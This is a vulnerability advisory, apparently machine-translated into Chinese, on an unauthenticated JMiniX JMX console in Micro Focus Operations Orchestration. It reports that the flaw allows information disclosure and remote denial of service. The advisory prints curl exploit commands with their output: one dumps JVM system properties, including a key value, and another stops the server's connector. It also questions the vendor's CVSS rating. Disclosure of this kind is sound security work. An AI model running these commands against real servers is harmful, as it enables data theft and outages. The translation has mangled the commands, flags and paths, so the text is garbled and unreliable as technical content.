(R1)微焦点操作编配信息披露和远程拒绝服务

操作的默认配置编排暴露了JMiniXJMX控制台未经身份验证的远程用户。恶意攻击者可以利用这个控制台收集信息:

albinolobster@ubuntu: ~ $ curl - d“执行= true”- x发布http://192.168.1.253:8080 oo / jminix /服务器/ 0 /域/ com.sun。管理/ mbean /类型= DiagnosticCommand /操作/ vmSystemProperties % 28% 29 / #结婚2018年2月28日11:01:57 EST java。供应商= Azul Systems inc .)的事件。持久性= false org.apache.xml.security。ignoreLineBreaks = true sun.java。发射器= SUN_STANDARD卡特琳娜。基础= C: \ /程序文件/惠普企业/ HPE操作编制/中心/ tomcat sun.management.compiler =热点64位分层的编译器卡特琳娜。10 sun.boot.class useNaming = true os.name = Windows。路径\ = C: \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ resources.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ rt.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ sunrsasign.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jsse.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jce.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ charsets.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jfr.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \类ssl。verifyHostName = false host.name = DESKTOP-F6M1S7H.westeros cloudslang.worker。inBufferCapacity = 200管理。url = http \: / / localhost \: 8080 / oo sun.desktop = windows java.vm.specification。供应商=甲骨文公司java.runtime.version = 1.8.0_66-b17包装。native_library =包装javax.net.ssl.keyStore = C: \ /程序文件/惠普企业/ HPE操作编制/中心/ var /安全/证书。p12包装。关键= mmvkDoBqly1UnneD13IinG_K5LF_5nhg user.name = DESKTOP-F6M1S7H $……剪断…

或简单地关闭网络接口:

albinolobster@ubuntu: ~ $ curl - d“执行= true”- x发布http://192.168.1.253:8080 oo / jminix /服务器/ 0 /域/卡特琳娜/ mbean /类型=连接器端口= 8080 /操作/停止% 29 /旋度:28%(52)从服务器albinolobster@ubuntu空回复:~ $ curl vv http://192.168.1.253:8080 oo / *尝试192.168.1.253……* TCP_NODELAY集*连接到192.168.1.253(192.168.1.253)端口8080 (# 0)> GET / oo / HTTP / 1.1 >主持人:192.168.1.253:8080 > user - agent:旋度/ 7.54.0 >接受:* / * > ^ C

注意在CVSS得分。微关注给了这样一个分数使用“交流:H”(或访问的复杂性:高)。描述为一个“低”访问的复杂性:

专门的访问条件或例外情况不存在。下面是例子:受影响的产品通常需要访问一个广泛的系统和用户,可能是匿名的,不可信的(例如,面向internet网络或邮件服务器)。——受影响的配置是违约或无处不在。——攻击可以手动执行,不需要多少技巧或额外的信息收集。——竞争条件是一个懒惰的(即。,它在技术上是一个种族但容易获胜)。